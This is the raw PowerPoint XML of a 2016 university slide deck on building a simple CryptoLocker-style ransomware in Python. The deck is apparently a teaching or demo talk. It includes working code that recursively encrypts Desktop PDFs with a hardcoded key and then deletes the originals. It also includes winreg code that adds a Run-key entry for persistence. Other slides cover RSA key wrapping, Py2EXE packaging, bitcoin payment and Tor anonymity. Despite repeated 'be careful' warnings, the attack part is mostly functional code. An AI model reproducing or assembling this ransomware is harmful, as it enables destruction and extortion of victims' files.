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5" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="271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71DCB4B-60EA-4A93-9784-C28DCFBCC043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7F2C5E7-D26B-47DD-8903-8271D43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9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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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0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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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97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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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3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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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87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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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06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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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71DCB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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65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71DCB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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7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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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9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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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2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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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8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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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6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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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7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CB4B-60EA-4A93-9784-C28DCFBCC043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C5E7-D26B-47DD-8903-8271D43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9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71DCB4B-60EA-4A93-9784-C28DCFBCC043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7F2C5E7-D26B-47DD-8903-8271D438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6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CryptoLocker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err="1"/>
              <a:t>Gameover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0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Quentin Mayo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>University of North Texas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 – Basic Recursive Symmetric  Encrypt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key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= b'\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\xc0\x85)\x10nc\x94\x02)j\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xcb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\xc4\x94\x9d(\x9e[EX\xc8\xd5\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xbfI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{\xa2$\x05(\xd5\x18'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See, I'm not that mean, I only encrypt everyone on the desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userhome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os.path.expanduser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('~')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userhome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + '/Desktop/'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Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> walk to get all directories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root, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, files in  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os.walk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(desktop):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dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_ in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirs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		for file_ in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>glob.glob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root+dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_+"/*"):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			filename, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>file_extension</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os.path.splitext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(file_)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			#Change to capture all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>teh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files, just don't add .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you don't want be double encrypt some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fiels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>file_extension</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  == ".pdf" ):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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>encrypt_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(file_, key)#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decrypt_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>to_enc.txt.enc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', key)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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os.remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(file_)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># Remove break to get all subdirectories </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411405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with this program(Using Python)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 wouldn’t actually be in the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use the RSA public key to encrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heck, a REAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cryptolocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> wouldn’t be in Python</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pass key at run time using a socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But wait . . .  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Py2EXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More information at: 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://www.py2exe.org/index.cgi/Tutorial</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://jeffreysalkin.religionnews.com/files/2015/10/71252133c3af704957124b2ca6c9c64b-bizarro-superman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919" y="28829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27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Invented in 1978 by Ron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Rivest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Adi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Shamir and Leonard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Adleman</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focus on difficulty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of factoring large composite numbers </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you encrypt with a public key, you can decrypt with the private key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you encrypt with a private key, you can decrypt with a public key.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http://flylib.com/books/3/190/1/html/2/images/09fig05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411" y="2603500"/>
            <a:ext cx="3027016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mathworks.com/matlabcentral/mlc-downloads/downloads/submissions/38439/versions/1/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803" y="5257854"/>
            <a:ext cx="3099015" cy="160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17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Simpe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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Crypto.PublicKey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RSA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RSA_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RSA.generate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(2048)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public_key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RSA_.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encrypted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RSA_.encrypt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('Secret Key',1)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public_key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RSA_.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('PEM')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RSA_2 =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RSA.importKey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RSA_.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('PEM'))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RSA_2.decrypt(encrypted)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icons.iconarchive.com/icons/icons8/ios7/256/Very-Basic-Idea-ico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719" y="30924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92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Touches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Need some where to send the money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Real Life would use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>some anonymized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>tor network in some coffee shop located in [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>anonymized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="http://www.business-opportunities.biz/wp-content/uploads/2014/11/showmethemoney-Jerry-Maguire-1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3356071"/>
            <a:ext cx="4824412" cy="248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16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050" name="Picture 2" descr="http://www.history.com/images/media/video/history_weeds_omerta_sf_1153426/History_Weeds_Omerta_SF_still_624x35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54" y="2595188"/>
            <a:ext cx="11250742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96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Summary of Approach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89931" y="6019800"/>
            <a:ext cx="5091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CryptoLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Malware | Security Chalk Talk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445" y="2603500"/>
            <a:ext cx="607342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/>
              <a:t>CryptoLocker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simple program </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two key components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Symmetric Key Encryption(Client)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For encrypting system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Asymmetric Key Encryption (Server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To encrypt the encryption program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Optional – Auto Start on Startup </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually attack occurs through email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually exe  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-Not in an interpretive language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ENCRYPTS EVEYRHTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://www.bleepstatic.com/fhost/uploads/2/cryptolocker-2.0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853" y="2603500"/>
            <a:ext cx="4232132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9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Takes advantage of the windows default extension override</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software Venders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Universities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performance Agencies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3 - 41% Pay the money</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Symantec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>University of Kent Survey</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://blog.emsisoft.com/wp-content/uploads/2015/01/%5EF484B8B773DF2857BE46FFE49E9230AB939DBE26ADBFCE98A7%5Epimgpsh_fullsize_distr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269" y="2603500"/>
            <a:ext cx="455930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0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a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CryptoLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in Python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Disclaimer: When ever trying to create any program that exploits a system ,please be careful. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3078" name="Picture 6" descr="https://realpython.com/learn/python-first-steps/images/python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272" y="1911235"/>
            <a:ext cx="4853196" cy="327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3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the basic principles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 CAREFUL RUNNING REAL MALIWARE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Just because you have a virtual box, doesn't mean the other machines on the network are secure. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BE CAREFUL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BE CAREFUL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>BE CAREFUL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BE CAREFUL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never create your own encryption implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unless you are a genius </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="604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Program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Program 1 - Main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Auto Starts on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recursively encrypt non important files  using a symmetric key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PDFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program 2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Auto Starts on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Display Message </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> symmetric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> key to get the symmetric key for decryption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program 3 – Optional </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Server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Libraries Used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Crypto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Crypo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> library for python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>USE EASY_INSTALL TO INSTALL IT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DON”T USE PIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Optional </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pycoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Bitcoin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2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Program Start on Startup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HKCU\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\Run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Launches a program automatically when a particular user logs in. This key is used when you always want to launch a program when a particular user is using a system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>HKLM\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RunOnce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Launches a program the next time the system starts and removes its value entry from the registry. This key is typically used by installation programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HKLM\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RunServices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Launches a service (a standard NT service or a background process) automatically at startup. An example of a service is a Web server such as Microsoft Internet Information Server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HKLM\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Launches a service (a standard NT service or a background process) the next time the system is started, then removes its value entry from the registry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 – Run on Start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keep information from the system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key =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winreg.OpenKey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winreg.HKEY_CURRENT_USER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'Software\Microsoft\Windows\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CurrentVersion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\Run',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winreg.KEY_SET_VALUE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#Write Key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winreg.SetValueEx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(key,'pytest',0,_winreg.REG_BINARY,'C:\random_safe_file.py')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#House Cleaning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1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1484</TotalTime>
  <Words>640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Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Ion Boardroom</vt:lpstr>
      <vt:lpstr>CryptoLocker  Gameover ZeuS </vt:lpstr>
      <vt:lpstr>Good Summary of Approach</vt:lpstr>
      <vt:lpstr>What is a CryptoLocker?</vt:lpstr>
      <vt:lpstr>The Media</vt:lpstr>
      <vt:lpstr>Making a simple CryptoLocker in Python</vt:lpstr>
      <vt:lpstr>Show the basic principles </vt:lpstr>
      <vt:lpstr>Create a Program</vt:lpstr>
      <vt:lpstr>Making a Program Start on Startup </vt:lpstr>
      <vt:lpstr>DEMO 1 – Run on Start Up</vt:lpstr>
      <vt:lpstr>DEMO 2 – Basic Recursive Symmetric  Encrypt Function </vt:lpstr>
      <vt:lpstr>Issue with this program(Using Python)</vt:lpstr>
      <vt:lpstr>RSA </vt:lpstr>
      <vt:lpstr>Simpe RSA</vt:lpstr>
      <vt:lpstr>Final Touches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CryptoLocker</dc:title>
  <dc:creator>Quentin Mayo</dc:creator>
  <cp:lastModifiedBy>Quentin Mayo</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-25T22:57:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-03T16:45:19Z</dcterms:modified>
</cp:coreProperties>
</file>